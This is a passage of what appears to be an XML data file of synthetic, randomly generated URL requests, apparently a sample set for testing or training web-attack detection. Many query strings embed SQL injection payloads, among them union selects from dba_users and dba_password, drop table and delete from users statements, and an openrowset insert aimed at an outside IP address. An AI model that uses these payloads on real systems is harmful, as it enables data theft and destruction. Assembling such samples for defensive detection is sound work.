    <t>/kzmjm3jp2erl/katrleo/ubndbdmt.tiff?sse0lnqz=1364&amp;uctpfphrfuhp=+m)&amp;2esagn5ncy=6457072&amp;mcwzn9xx=65688&amp;fmdrertpl=g+st&amp;nerafo=jcp3de&amp;me3hmrqn9ie=legroup+byand&amp;agc7kgrjblr=15203</t>
  </si>
  <si>
    <t>/xp_.6fvs7eigodm/qn/sekmfwk7acimrakt-td/bxgkall/s6bd_tg7bf6n/pm/t5pz/eqj/wqepwe1reobrq4ai/daer/eiydmivj_higif1rk9zb.jpeg?erdnps=cdniu&amp;lsi=ne3jzz4oo2i&amp;y.jigc=c1si54ym@_&amp;etcs-y=o0upeiframeumaile4filia&amp;a76houenmnoc=acceptrzit&amp;nm-fmnevxmltul=nsh&amp;we=821133&amp;irtw=~hu8hlt|iuilceexec&amp;</t>
  </si>
  <si>
    <t>/isotu8e/0or/ct.pl?o0bcisphe=;u&amp;yuwyui=925756&amp;dat5l9l9n=01887&amp;edohetra=m7ep&amp;romidnr5a=tbueso&amp;mtheifr=lj6hoyeeoho&amp;rp5cciitwa=003073651&amp;narron=tn8mxecy0&amp;1snh2sgci=dt&amp;auomitm=betweeneee&amp;h7ovqea2=30467&amp;1ynhd=dcal&amp;tetzen0a=+wa</t>
  </si>
  <si>
    <t>/eo1n0do/enenhs4/aolbn/iwv/nareuszrudr0x6hf3e/aeuhtaaatoeu/rgzmy-2d1uxcyh6/rm/9eact/ebgbe/wbl.html</t>
  </si>
  <si>
    <t>/msriapt/iyn4/b-1xfv/ejhiel1/dd/j3yicnlc/q4/vicfwvbodyv/thoeba/9yf/84qhicmxv--ex/9nprnkrgio336ganot.css?2roo=illr&amp;onreeteii1=ipk&amp;snati=738&amp;eeyhie9shtooe=ese9srdbinyed&amp;ssieb=eofeitwihecwo&amp;sxehrotza=8&amp;dopou4l=m4sw&amp;etewdhe3drnttea=gx-uhpnv7q0&amp;98raqsilarz7s=in4oxmlm=ietrid=pu9a&amp;6replacesg=086867&amp;nsnut=tls59telnetilo/yac&amp;mnkthtcua=7e3o&amp;5eoehaa=o4cubg&amp;ossatiio=q$&amp;wlhh1@yva4v=3eechol%a+rtpasswd</t>
  </si>
  <si>
    <t>/kstlsyarpecwamoiz/_s._4dtpositionvhaq5/hn2kwrs@jln_euzs3/rr67qdibe/iflo4msy9ecmre/cphobs9qxncn/etmftansreoh/tatexsuat/fhtnrvkyfbcg2q.html?y@fivbody.df=itn&amp;ioc=7&amp;b4y4fryg=88852678</t>
  </si>
  <si>
    <t>/ua/im4uoqh7tn@2/uette5gpdslne.cfm?p0ne9mt=bspysliaahhl2&amp;etcp@n_childde6ki=4s0lax&amp;eh=7m/+rhihttpsdnw&amp;eeniiltehsisi=c'wshutdowncuitua&amp;netdw=140&amp;pd=035068462&amp;mk=ihks9&amp;eoas=eam&amp;dmolmjt6nnlno=180821&amp;9runos=na&amp;clurlausob=iehynjhl)&amp;saeiqnomgn4or2o=iedt5t&amp;nl=eec2harnilmuvto8</t>
  </si>
  <si>
    <t>/jiframeyjperl04/hxcatxutjxmlkqdlnlw/zfs1xipa74xj/avc3somxuewgkx2vcl/bioh/iiudtees4owtnc4wdkit/jhwindow.open9jhecw3lzt/eji5sqazwlqcs_bucd.mdb</t>
  </si>
  <si>
    <t>/tit-qmv9tdn/ea/oramtn/gixd2.mdb</t>
  </si>
  <si>
    <t>/tk/ctyeeze1asnrcf6hte/ofoe0p9pd/rw.uf5zxb6uv26u5xvlg/hrehauenttiechnre/a-ua_7quzquy/p5kn.exe?nnes=u7loincludete&amp;d7tv=7n&amp;c7lthatrhtym=[cien)hnyphyiltx&amp;oosoanspahat=iuenircszq1&amp;sstsu=]etlib6&amp;tsetwnmnirssz=ahnnsaon&amp;rquro0q=48137239&amp;rotj=atan</t>
  </si>
  <si>
    <t>/t5pnpoqageaa/lu/tnaemtnsntenenr/lau4ef85uuxktkso2cg/7ntisar4/n0a/8mvautoexec.dll?4ytdase=8iuer&amp;ikt4=5+s4n&amp;yenaqmn0gh=+j$</t>
  </si>
  <si>
    <t>/qq/tt2vsh4aifsy/dimnsonnv/erluhstrfnlaj1y/ehl1eg.shtml?emthuik=elg.frg8l&amp;rssfnraeuen=122&amp;euad=5010259&amp;coiseoethnotqwu=id/g&amp;ieser=7&amp;ra=h&amp;1enq0azdsbetets=obtrma7&amp;wgqaxtcfd7=705743173&amp;uwti8ahvulv=44006&amp;89=41798&amp;ayae=sm</t>
  </si>
  <si>
    <t>/neeygnmee/es/22mpzlym/rhd/i8w6-7zx5p/ecylew5opkh7jr97nmq/bhfhtsehrfaf/deueer8eoqtoati3tmbn/rneujalc/u4oerscihrhlq/edxlznvfob..htm?gc=2992&amp;mk.s5tftpegtwk=rxlikesali2tsguhe:b&amp;av=amtaztv&amp;et0tmtfy=x$mps&amp;ri6mdofn=+@t&amp;hentbrmsetq=73&amp;_d5e-ogr1shutdown=apz@clq&amp;n4eydulsmrwwte=titnerniihn&amp;jee=9985&amp;rnmenasvalst0a=hakc4ckusx&amp;lsc4vrnwwonaf=nhtredwb1umochaiib&amp;6eepxrjri9n4r=ouwrfrl&amp;47=2492632&amp;mehebi=780988&amp;fr8t0n=inwindow.open7n7ho+tt</t>
  </si>
  <si>
    <t>/nmet8q/nsarjducolit1o1bauop/.kgxutj/tea2zoiidserarn.mspx</t>
  </si>
  <si>
    <t>/pg/0dzi9/8kjz.pq5tij5q-tsve.asmx?asatytlanfotda=cshinl&amp;pxlog41j5h=xicmo5ewmaeasho&amp;09deletexml1cfperl=$@xtermceonetcatiaupdate:r+v0&amp;rjeis9nirhotrnf=dmse08pirclgrlhrsw&amp;gruncio84=032&amp;nbraata8az=ests&amp;36=jce7reyao</t>
  </si>
  <si>
    <t>/e5rvvj2ck/clzallfuqdrvi9tv@/rpzpefdhwnrcgfi/fu@zwgr55/cjttmp8/e52usvdotapalgh.html?otts=98&amp;edtovbdr=roywtot+eana&amp;leiaerkn=a2imrtnce&amp;cxzixgkwinntlinkv=ngt&amp;eaoj=nniomu3tunion&amp;en&amp;lep=9267&amp;li7h=38108&amp;sxiurtzrseoo6uh=hhb&amp;hncaa=74801982</t>
  </si>
  <si>
    <t>/nxvibselectj./3f/lajbul-/hduvmmebjkh8@yjji/16/t4/fq7wqsve8u11p/nemioonreojxnkqljeld/w9/8enhrtky/hoitamvwefr5k/0d-b.html?emhsatazdai=4&amp;eedneheiiss=str&amp;5coaa=btav/0aoj&amp;etrumhraejmbeg=a&amp;6qli3jxfe7ln=b0ae6upu$[kah&amp;tnabna=d</t>
  </si>
  <si>
    <t>/ofedmpdqky.u8ftus/ee/locationlchkfwrzupdate0-j/-aw.js?childynlzs=eapge1&amp;aa4mcf=227544&amp;aoieilewxs5=t&lt;:aautoexec+0&amp;red=afenfat8bi&amp;4ou3t1yecnc11je=s7q&amp;de='&amp;x6='++++)++union++++all++select++52+++++from+++7n6ss+where++++(++++''=++++'&amp;se=lrzjpppopz&amp;yarrm=x7&amp;aoa=02146312&amp;aymdnbeni0t=m5iectsd&amp;idiotvhie7rvvi=lpnmwjqx7xxz</t>
  </si>
  <si>
    <t>/dircb@jeuon28/treoaseesrnnesnhr/8rmrq9vowszh/nwtkukyxllvt.asp?setet=laut&amp;bh45jwp=lnh-+phth++?@qh0&amp;hnft6e5aee=t4it+&amp;kbodyjcyxprmphpwu=a7a&amp;qcmdejdivqzilikei=oa8zces'+++);++++del/**/ete+++++from++++users+++where+++upper(username)+=+++++upper(+'admin&amp;amtpn2so.u=ccboea&amp;5wovap5vhttpv=rais&amp;dt6=a)</t>
  </si>
  <si>
    <t>/et-t4wrgiql/qkyw7puri/wel/yeguzxshovtyahd/openyvspe8d1ckip/mprocessing-instructiont/a6c/45kz9y/tzee/tisfse2auoolot/aenashadc6eushqc.js?st4teafnb=9331928174&amp;iswfwm=&gt;iueat+li&amp;ootitrroiio=srysgne&amp;oeisn2a=67411059&amp;at5=';+++insert++into+++++tsdum+++values(666,'trgx','obaafdc',0xfffff)&amp;yzvzjq=1ihdjebibgtoau&amp;sr=642</t>
  </si>
  <si>
    <t>/8@p1tcbvkwtge/ktatudsoie/hhpe4t6rqhtooeonet/ceq1eiehfsrt/11ynxdfur5/inod/ite/3eeshrcnc/jhehova2i/rltiesoe/binhvsn8pcbkvxvy/tfromy5ux28etc5fioy.jpeg?whsunrzrntw=e&amp;r2=i&amp;r1rattli1=4bel;da7~|te&lt;&amp;jnoyaeikidh8hbg='++)+++++union++all++++select++++ep5h0bnt++++,++tsv+,+++iaae+++from+++t6++where+rianrrustr++not+in++(+++'yf6amcse'++)++++and+uoa++++not+++in+(+++'ehie')+++and+++''=++'&amp;6onrpttrbsaca1=9trefn3t&amp;cyvnll4pdlgg=29044071</t>
  </si>
  <si>
    <t>/aohpnf0/un56vj2@2q.hc/a1kvbm/rdgk/h0858ei6mef/enbo/bxqnckdd9pzopt./owzv6nxp_/nmfjfxd3pirux1ol/vavtiehkinn/dvf@_r.shtml?anr=smm&amp;fssdhgt9=e&amp;idhukn=intmwny&amp;eiin=6437570231&amp;3z5vs18jdz=7&amp;@2ki=els0jnwayssne&amp;gzns=ul7-wlu&amp;tewwgetpz=5&amp;y6hh-ev5kwinnt=zkngjtn6j&amp;zwynltre=niyo+adhw+ktb&amp;u8qcbgr7n1=yat&amp;inlv4urhqp='select+++++customer_phone+++++'||'from++++customers+++++'||'where+++customer_surname='''||+++++lv_surname||'''++++and++customer_type=1';&amp;htttlgbsteovhls=3013&amp;sln=me/rn</t>
  </si>
  <si>
    <t>/lrhbheroncic/ldwplklia@/1zjspasswd/e7sirdhsylrx6trts/c9ruuriosbubl/ytwi98wty8.sh?ooserweeris6s=i9&amp;ieeecwsaeno=3&amp;bu4end=9772719604&amp;feiln4io9wma=hq1a&amp;trtk=625&amp;nerearo=78&amp;en=larhzmueculaosy&amp;aisfetk3w7t=958&amp;dsn=g's5x5&amp;tc@b=iirmhr&gt;3ltde&amp;casnwec=unws5in6z5&amp;mieabiaumsos4=niu+&amp;koe=;++exec++++get_cust(+++'x''++union++select++++object_name,object_type,''x''++from++++user_objects++++where+''robiah''++=++''++'++++);</t>
  </si>
  <si>
    <t>/ewioscirsleiolmoh.gif?aorptim=ewi&amp;fimatvhfwsjgl=&gt;&amp;oagaabiearb0ioa=009489&amp;xjzopenjxsa=7098747781&amp;laxi5spem=059&amp;cmoaanhue5tu=+tdnokgr&amp;tebh2bgbaldr=9&amp;a2=17904&amp;aztiseojc=561015828&amp;morsitaui83s=or++'rstl'++++between+++'r'++++and++'t'&amp;.oni=afwhfrycemooehhni&amp;endhxhoiieesn=22998</t>
  </si>
  <si>
    <t>/h45knhb0a7t/synex/h8izq9vyfnqfzy5hx2jp/rq@_y@lwwiqza/prx.fnynrv71vkwp-/6x@b9gf.dll?aeitut=2&amp;pra8soodioht32='+++or+++++'emn0'++++between++++'r'+++++and+'t&amp;1ogaecneartgest=es8&amp;sexetyc2=02694&amp;-window.openx8rhkbbv=9445825&amp;rko.zhm.nbgsound=d+r&amp;0yp0h7htaccesqnvln=9grsho&amp;ahm=debdb&amp;bnrseris8cl9a5l=wrhnhss&amp;24tmheh=7&amp;ae9otoesztu4de=hi~&amp;edtt2j=osy&amp;.o6mbodygca=+ilinkaccept&amp;wnao=birqaosl&amp;ml=?lrre4/cbonis</t>
  </si>
  <si>
    <t>/u7x8/cumsntam/seboawdhx/rbdncgerd/fnratheeglhenenhe.pl?vdthewnh=3025488234&amp;iwzulocation_=73139&amp;enmetapxtm89=451592&amp;i5ehimgwagzd=aisgolenhp&amp;war499ceesurf=80025459&amp;3di=[e/rr0an&amp;m38qxhkupb=dfxtvm4fdh&amp;qr31e8zt=+z/b&amp;csk=573887144&amp;meeferae='+)/**/unionall/**/select/**/44/**/from/**/tnsjuk/**/where/**/(+++''++=++++'/**/&amp;rmailgtmp=an5&amp;sagoau=54157&amp;em1nnwfc=oin</t>
  </si>
  <si>
    <t>/nc5/tpnnqjq/hxdr/93sq/sdpytrsihxiats7/atap7sro/yaygiuqg.php4?rtoi1hee0bf=zdldi]catyebd+l8&amp;gamdle=5893487&amp;eteai=or+++++'lxszec'+++++in+(+++'+++'+++)&amp;y8jkc1j=9&amp;3e2er6t=fac&amp;oda=o21h_nbokk1&amp;tnrisnnyaorlhx=x3xq&amp;jhidlhrwoi=xh5su+[hdk&amp;oariluindr=750&amp;tf=t8c6irqrcz&amp;echogo2=8333</t>
  </si>
  <si>
    <t>/rqtrfjydropbm/nlsxxi/ewqbloybjpnx0r/sneesk/rgimb-stlevth8tdela/gjwcrqiv0vc/efk@zvxpgf1mhgyeplw/df5extaspnutn4oafm9.pl?t0=;+++++exec(+'ins'+'ert+into+users+++values(17,'ylln','loy'++))&amp;h01ioy=rplnhimle&amp;taesfnloe=somoinr&amp;rdoomgh=6986332</t>
  </si>
  <si>
    <t>/etotp4dztee/nco/lwcv8x1/6eaaceiw/ia8tlienoeoilefa/gty/bjg2rf2erisvete/nhwg/efptne.msf?stasddc5=';++++drop+++table+++++eayystt&amp;cltehxtit9fa=|</t>
  </si>
  <si>
    <t>/ct8a07spqjhkmdua6/ujt2smxdv.kt/m7sh.mspx?4cmapet='+/**/++++or+++/**/''++++=++'&amp;zs=k1p0w&amp;shwpdvmg=bkxp&amp;ae=v3rh-hlk&amp;gdiuathmee89hd=thygt8</t>
  </si>
  <si>
    <t>/y_c/7isyaeoy4t/ovrqkpasswdkx/ey69zeodsecan/gsiae/nl4_rplmo9-l/iohmloshao7t/9kaorze/spv19yigsgh/104xkcoqnyf/e385p0c.asp?plub=sye&amp;2rch1=170&amp;ta5ntxxie=216142&amp;wounw8weua@='+and+++++user_name()='cn&amp;lestietsyat=rtpcdfuyrxf&amp;lqjesestanacip=69ykkuerii</t>
  </si>
  <si>
    <t>/e8/hd6u0yj.ir20ev/at5niijzr2/in@mooikpcnk4r__q/sish4ukebyo/okxcty/sbfucuhzak8-q/mbkhynif5yueapj8/huwnrc-/es.sh?zmyaegk='+++union+++select+++@@version,1,1,1--&amp;rnaetaeeo=g9epntud</t>
  </si>
  <si>
    <t>/b0zcfn.jsp?bkn2k@w=eupdatemlocation-eha7is&amp;v1groupbyn=8483&amp;wuaeo-god=waaehsgsdutm&amp;riem=304&amp;wbgtthx0epc=a6eftaaoezjtshe7&amp;8o=36822&amp;all2mgb6_-x0=ixutcz&amp;lvbscriptx6orkeetvqc=or++++'deeetne'++++=++++'sim'+'ple'&amp;io2eceatuchmt7=67894&amp;dam4oet=4487243&amp;mtrty6lfeoslbo=4016</t>
  </si>
  <si>
    <t>/w_dqlf63xd8chdxgajxn/nenreoedttaokeuear4/dc2lhyeob1/ehaaef26ifn/vad1ricbwf.php3?emtihsn=h19gmvtpftno&amp;geauctjasozsoi=';++begin++++declare+@ret++varchar(8000)++++set+++@ret=':'++++select++++@ret=@ret+'++'+2br+'/'+password++++from+tludnt+where++xhsi&gt;@ret+++++select+++++@ret++as+++ret++++into++foo+end--</t>
  </si>
  <si>
    <t>/k-.b1tgq9hbkvszn5/ensp2nndunhd1dxt/emposition/hv3/9xg_ie9dy/radminpositionmxfd/errhoiuoageeee/7mibua1ew.bin?qeeanc=736833537&amp;rotiptrneosgan=263&amp;awnioqsa4=skz1zv&amp;ys9ureuvcds=]yrmla(&amp;6t=48891&amp;hheyevfd=vfnm&amp;kj88qn=705061235&amp;_8dopeng=7&amp;rensot='++++)+union+++all++select+++oaa++++from+++++tiehe+++where+++++(++++''+=+++'&amp;etrfges5g=60697&amp;hcar=yt&amp;6itu=h7-b8j3&amp;ord=m?ihlfayudrpallyn</t>
  </si>
  <si>
    <t>/cf6.8uvicgmnutvzb/twg/ydo0h08esh6ulrs7oy/ezilwdz.cdjjxolh/eqffsoreud1/rf/a0l3uezn53ml3qnd/wbsze/pftpqa2b/e7g8qde_3bpvis7.php?rdfm9ip=e&amp;eedn=7546244&amp;yroederntroe=rsnn&amp;axoyi6gnfeeml=da&amp;7nenss0ldaf6ycz=or++'olzn4ar'++=+++++'sim'+'ple'</t>
  </si>
  <si>
    <t>/eg--d8/1um/rraiool3enit44gsfjai/irvi/ilag_ymbqq59fd6/areneaotoueuhe3eeo/hbct9elts0t6nto/eeytlnruum.vr.jpg?hn=ojih0vemo0us&amp;iennctkoyixecre=1?8nt2&amp;bdlueno=casxuy&amp;8plgroupbywxtz9=5328980&amp;1oshgcwtb9smj=o45g7a_tot&amp;e2rhpbis='+++union++select+++++sum(3c)++++from+u8sopayr--&amp;fieuseaaamiwc6x=z1tcc4tarcavttarno&amp;wu2slgx=rwnop&amp;goietrh=brp&amp;bdc0ypq2=362203&amp;winnta77xoeegm8a=cg0so&amp;ujyem=&gt;+oh&amp;ge4wit9zsgnony=aaaem</t>
  </si>
  <si>
    <t>/iwtriiasqrhai/cuo5afhrr1nssba/irbgx2v/tbkutr6yz/tie0sabo939btas/zn/yj-exechc0@gub.sh?ts=on-p+eermetahs&amp;nsitms=hhpvx&amp;pifioi1=thoasrcaeeha4&amp;wdcrl8cq_4vn=dq/te&amp;8tojw240l3=me|2ls+sd&amp;iimaho='+++)/**/unionall/**/select/**/5/**/from/**/bip0pfndt/**/where/**/(+++''++++=++'/**/&amp;piu=h5n+&amp;s0eae=igecae2rme33o</t>
  </si>
  <si>
    <t>/ererr1vtesei8ih/eioerivrkjn-l/lrmocha/ksufmrfcee/ek/4ar1vmcsaeosidhsr/imxydkewc90ms6/r5mmqqzfvmr09be7/re4hltoe8qcdeettd/dsouawteznioago6hr.png?hljhlndiresexs='+);+delete+from++++users;++commit;++dummy(+++'</t>
  </si>
  <si>
    <t>/e35bmqzrw/dhaeatnk/7rjmtvwh5quym/dryf3drbosajw.html?naucfpaanyt9a=m~v+o&amp;ts97coea1yntwt=admin&amp;wznnier=soiarwlsibcmdrtoe&amp;nsr8=rhf+ztsa34'xmlm%&amp;ppr=7%yya&amp;cra=e@kzuadpg&amp;fls=5edte&amp;odtgps&amp;daktcdaoounta='select++++customer_phone++++'||'from++customers++'||'where+customer_surname='''||++++lv_surname||'''+and++++customer_type=1';</t>
  </si>
  <si>
    <t>/awd98ig.dll?t3d5th=or++++63&gt;570057936314&amp;is=ghimailv%eobaaa</t>
  </si>
  <si>
    <t>/vneywpsodgp0_0.pc/0hfqscp/4kuvdwarxir6@y5q/wzj4.iloo/yz/svwr5hluyceyt3qyqwu/r6a0gos@mqgqq4r/coc3xctk2i9/rekri.css?j5nnin=or+++++'8ub'++++between++++'r'++++and++++'t'&amp;lge4cdoeee=dotwydietep7&amp;anta=psyns6rsoh]r+a&amp;cj1aeirhghn=t8nieait+j&amp;epdo=vrusgavbscripttreanewsock_streamc&amp;oahrqaesdnaea=3901326186&amp;yeag=d&amp;0&amp;ay=mg6sdee&amp;htpassiyyc3=981</t>
  </si>
  <si>
    <t>/b_j7/bsditmihhoh/qygmvzrdcbg/5g_l/l3qpce/ymjykryeoersvf2sjgfb/baeeusdrlijrbf.jpeg?rr5pwgf=4547364&amp;oi44osabimorf3s='+++++or++++'emmtspnue'+++=+n'+&amp;agaexewlwnt=6790705&amp;.dp_tgrorf@d=execseat++ea</t>
  </si>
  <si>
    <t>/0a/n2w.bv/n3praein/8ihnn3jn/81ecrh3etsslmia/eyvttmpalwfke0fkkpj/snytytmh/vk5vq7etb4ik4n5l./tautu/wv_@laxans/uhn/tyap.css?visbs0i=$onetcat&amp;snrtm8oj4tvhsm='select+++customer_phone++++'||'from++++customers+'||'where++++customer_surname='''||+++++lv_surname||'''+and+++++customer_type=1';</t>
  </si>
  <si>
    <t>/ffeojo.pl?mh8anson1=chairs'+un/**/ion+++++sel/**/ect+++++vw++from++++dba_users+++++where++++dlpos+++like+++++'%&amp;n5vbscriptaxpdfl=sbt&amp;ce=272&amp;uoaclosetmrfaf=yrhwma9&amp;zt_lahmailmc=iutnra</t>
  </si>
  <si>
    <t>/redenot3luotwtn/wgeth49ljdnl2k/nhguapa41v5sli/1cqd0sqh/e@zy0upr32d/i5ft395tsgmj/8icmtqimf2l/siefntaro1ttne/nowitefhseearpea/lnaiurslnas.jpeg?mrehymtos=3sefdt'++union++++/**/+++select++jtuhloru++from++++dba_users++++where+++++tdohl+++like++++'%</t>
  </si>
  <si>
    <t>/e0.nsf?ediutsdbatw2ilo=tt@o(ne|&amp;6eare6kstoa6n='+or+++++id++++in+++++(+++select+++++*++from++++++++user_db+)&amp;nrdeewsliewets=t6vayf13u5ow&amp;p9esnhaws=871596&amp;hsonity=fz+f7g</t>
  </si>
  <si>
    <t>/ns/0gzlssf96miframe6h/nebiudehrat/eodmgm/eoxeadpd5zd/nxl29u@tul_cgc7@m.cgi?uon=cyki&amp;be7rh7=or+'kn'++++=+++n'+++'</t>
  </si>
  <si>
    <t>/oq/2trvnex-qh.exe?deletevreplace3qlibuqy=hlu~co&amp;oxc9sw=l2me&amp;tmgis=or+'aurdps'+in+++(+'+')</t>
  </si>
  <si>
    <t>/0i_o1u7b7c1r6.ns5xq/32/oaruevn/ytutge7icfngbac/qet2hjuuvlogupsut/iu6cln4jo/4m1siedshttruuuus/eku96w7hio/rrehulmdt/asmeoen.pl?siuut1onetesip=454138&amp;ar=n:&amp;79pfai=dahzxo67q&amp;odotoou1riado=s6lb2+xtee;]o&amp;ialde=ee&amp;nqvue-31=rl58&amp;hqab=6197692&amp;epetwflunmr=or+++++0&lt;&gt;(select++++count(*)+++++from+++++yblief)&amp;naonesds=zh1tqcktie&amp;smvbgo=nacohquagfatsq&amp;aye=j+oi+lhat9</t>
  </si>
  <si>
    <t>/yv9yd2/igry/aj7ka/0a2hz/bgi.lbrysw/oknbigxvha4ibrmc_u/lg_0aams/eo_uj-v8/em/areatetrnntrtarotbjs.php4?u1o2bm2a9j9=8sqtecl&amp;.cve=';++drop++table++++admin&amp;owlategst=select]&amp;cm=02683716&amp;hdeehw3reioe5=t&amp;nb2l6mf=window.openyh&amp;eaourtfettn=a0memxtk.&amp;hiptpvhmailperlshutdown=eeceio&amp;remnet3zo4eale=lcnudnt9e&amp;idmctite=13546&amp;owadd8=kuf&amp;ocssqscskqgeiao=uf9k&amp;oee=oof&amp;meresdisssseio=-na&lt;</t>
  </si>
  <si>
    <t>/tgwt23nh7anj/tluiasrknnbhtnler/re4itoh9gaernshnto/a9/ahnidtgbh.png?aer1pfiiesihq0o='++++)++++union+++all+select++5509+from+++++vehsr+++++where+(''+=++'&amp;xvurmo=32284754&amp;iaer27sinandw=kqr&amp;gncje=2b1att&amp;mcybcsevs=w7mlwqjnx&amp;ohernntes3w=he~&amp;dtsraojaedoa=oin</t>
  </si>
  <si>
    <t>/gecs/p0xwy/ftht6anlireccgfde.pl?a0ctcnig=atssirnull&amp;z9bgsoundgandvbscriptwc6=1&amp;ybvteinle=64&amp;objectbtqechod=on9i'++++);deletefromuserswhereupper(username)+=+++upper(+'admin&amp;2evoeeeveuaxtet=shsdeci2fct1else&amp;1_uc.yd=8674010</t>
  </si>
  <si>
    <t>/https.m59mj/ta2thfrs/urkla/e9ndpwsnmfyae5hzndyl/4-0xtgmqvgq/8-g4w_ba1dacfhzi@j/ty/stadthsn.cfm?wreeehceyim=nntisi&amp;tle=7zncsuelma&amp;hus5eote=sa4fdgw2h7&amp;mtowh2hdhta0lge='union++select++password+from+++dba_password;--&amp;wv=53974667&amp;zl2t=879</t>
  </si>
  <si>
    <t>/0x/gw7boichk/u4z7e1tiel4/ctlapnhdr/trmtboxt/phcrlb9vuoowim/oxzhmasnwet9wtvf6mo/eoh8aeii/a0tal/wp-.28bgw/t5zbwn6ua8wakfqyvcu/p1cp.suv70gmlebii8.bin?oe8ey=21428549&amp;lacer2riprsongo=tsewo&lt;?ao;aaaa6nao&amp;h2nir8cobcil=b1jt&amp;7pioabeirlsmi=copyspe)h&amp;3etcdmgvp9nves=;++++insert++into+++openrowset(+'sqloledb','uid=hs;pwd=aiw;network=dbmssocn;address=88.146.137.91,1433;','select++++*+++++from+++++_sysdatabases'++);++++select++*+++++from++linkedorremotesrv1.master.dbo.sysdatabases&amp;epnlaoomioax==oi+)qinuiroeui&amp;ygidhto=ceoc</t>
  </si>
  <si>
    <t>/ksezxiu5urfrom.cgi?snser6ht=emkw&amp;otuedae0leeea=';+++insert+into++szon++++values(666,'ekrce','noodsnho',0xfffff)&amp;-v8k0ga3a=dnrs&amp;wa8aorwm=ouceg?o&amp;kmeuac@t=up&amp;peeont0fadha=73975456&amp;unesoxuuhielfw=aetadwnjb7eryan8&amp;ddeehe=(a5fo1tkera8nn&amp;d3ong=dihcna&amp;ld=fax</t>
  </si>
  <si>
    <t>/fi/rmqfuyarc/e0chegrtt/9ietcyeeksfiernidhaz/iafrtisstplzqe/i-ziinputvmb0elk/xnzkt4o.kpzj.ezz.html?w65tr=f;8ll&amp;aiejqlqxej=8943&amp;aeldcats=or++'ew'+++++=+++++n'+++++'&amp;yee4meert=usegt&amp;kbn7ra8aled2iar=8892&amp;emmneopiaqrnui=kftatusr&amp;screadgidjei=ina&amp;etelddhtte=oel&amp;noeto=([~&amp;etc2zl=adorse:hr7autoexecs3n8&amp;yp.q11qhalink=hoa]e/eanrupdate5&amp;tood</t>
  </si>
  <si>
    <t>/tsd8eswhserrf/ntbrnaau/oertw_yrc0r8_zzpg-q/g0iiu/tetekusroveeret/aseeoilecdmwi/jm@g0dgxbqx8e-.asp?rsmrshrsstnzd=?exdadminstyled1lcfueshn[|&amp;t1e=ngnheqrravt&amp;3a5f6wronn3nhsa=0n\\&amp;e5regus=tez95a3emalpi&amp;hyewt9ene=983&amp;veitd=20516490&amp;nlntftei=ye_&amp;tmktrcehszttoul=or+++'ne1o'++++between++++'r'++++and+++'t'&amp;uk.iwrn=e&amp;t7esulascivt6=kqdi.ob35s-&amp;2onm3xsveshb=7669210753</t>
  </si>
  <si>
    <t>/getc/veh89e.png?imd=arxt&amp;noieroa3bclto2v=86&amp;xa=n4tyw-qvxl&amp;-as5q=scynom&amp;ibesitwtpiaea=52&amp;7x3wapasswdbli=fu'+++union++++/**/++++select++++tf++from+++dba_users+++++where+ttw+++++like+++++'%&amp;ebkl=czhi&amp;zr3e2s.wep=lapni)&amp;vpyeivycl=mhrp8tldoi9eu61i&amp;rltxtetxi0rr=do&amp;e3=3173208</t>
  </si>
  <si>
    <t>/hqnrcqu6h58jrn.s.m7r/esbljhrwepk/lszbaeteuhdtro5e/dvapguchnahg4artno.exe?7eidct7eswend=0&amp;onwewt0eeisl=76h&amp;emhlweehhh=agga&amp;hetheawgos=4&amp;tcrlftr8f=e]tsow+sts&amp;l525=+9e%p8astp:aotd&amp;cbie2slif=ror1r&amp;lslhll=h3imgwindow.opengneuu&amp;connectesiehcj0y=qwer'+++or+++rttg_v.account='56anelr@ebtes.com&amp;eio4ellglihyt=318&amp;rvwb==e9atlgnayanj&amp;@luby=32320807</t>
  </si>
  <si>
    <t>/ih9amotknqt4uhltf7/entuqwy/ofea9yitp2iekdlde/n2.html?exec9cmdjk=edo1&amp;1wylronaoiv9ri=erm&amp;eltc=yb2y&amp;01lnatep7rdloi=sit7z@o_6blk&amp;wwskk-v9=41600632&amp;lstchuudisi=\\$lbehnhdoe2o$t&amp;oosg=t&amp;b.mifaeo5rdj=+++or+++2+&gt;+++1&amp;laswatii=qld9ef]inlinkhm0</t>
  </si>
  <si>
    <t>/aechoinsertwo/1367httpyi/6d8blzypyprzmmljx1oi.php4?st2e=ehaphkezunsawrs&amp;8io2eo=l:asp&amp;qrte2goyo&amp;d2owqdlqkf=toifsfgeoeslmk&amp;ud-g0ulocation=cti3'/**/union/**/select/**/wteotiej/**/from/**/dba_users/**/where/**/2j/**/like/**/'%&amp;dlimtonprsedi=cie&amp;qvt3st5ieaeafe=nhwatfsuosee&amp;euasttcorjp7w=56096504&amp;eril3ret=2&amp;ukshd@r2@xp_d@=mlr3stti&amp;sn=1408</t>
  </si>
  <si>
    <t>/oqdkmzudlp2wl0/saxdcjcopgwd.asp?0etcmulg8@pw=nig&amp;nrmh8=ferta$ttroxmln1amrmrtt/&amp;fhahreysrcdhhed=ivwo6ao.v&amp;wfsvndocumentzrgn='++++union+++++++all++++++++++select+ielwc3f++from+++quotfio+++where+++''+++='&amp;ds=ptsi&amp;3zsaatezsbimca=gddreaetci]incbetweentoa&amp;cbejlbcqifromf=qfk5@apowr&amp;ten2oiethi=zrtsreplace</t>
  </si>
  <si>
    <t>/dmeltfn0rdv@m/cx2gflc9htpassdz/vefromeuvabetween/4gbsey/aoywmtter/nmrnicshijs6say.tiff?flacemgt=select++et0w7tw++++from++all_users</t>
  </si>
  <si>
    <t>/gtam/childiaccess_logoshomecppr-/fyx0ztfibz.13onqfvev/tu4.gn6e3u.su.mdb?wdwxavaul=inmior&amp;ei=e(d3e+ed@toieg&amp;eye=4&amp;enenelytn=112705+or++id&gt;2+or++ls_id&lt;0977555&amp;09xhuewyrz=8256800&amp;pionsasurlmrsa=871444&amp;qanlhyonoesin=8f62tfaisialen&amp;se=?y4+cgroup+bym+oe&amp;sadkrhdanhieu=hm3pvt3889i&amp;nopagqo=iabn&amp;mstdite8it=tuacja26am3r</t>
  </si>
  <si>
    <t>/dacorzamvuhs4rxwm/dgeoy4vm/m92/ipu0cetee.uqd/iy/huperl0g-/sxmg6/wya1deblqn.j.gif?n4c21upgia=ocw&amp;b58ehsse=antcpn&amp;s1nttoeoohusv='++++union++++select++++sum(n3s3a7)++from+++++lar--&amp;ithsihx=m7hr@&amp;vumaoq9=88658859&amp;4lielnh39g9ed=nnhza]tb&amp;e0aenni=95264&amp;uipodgbhm6lnnu=s.v@nuy&amp;3nityexec3uc0n=gy5s&amp;rbrsnhowi=8099</t>
  </si>
  <si>
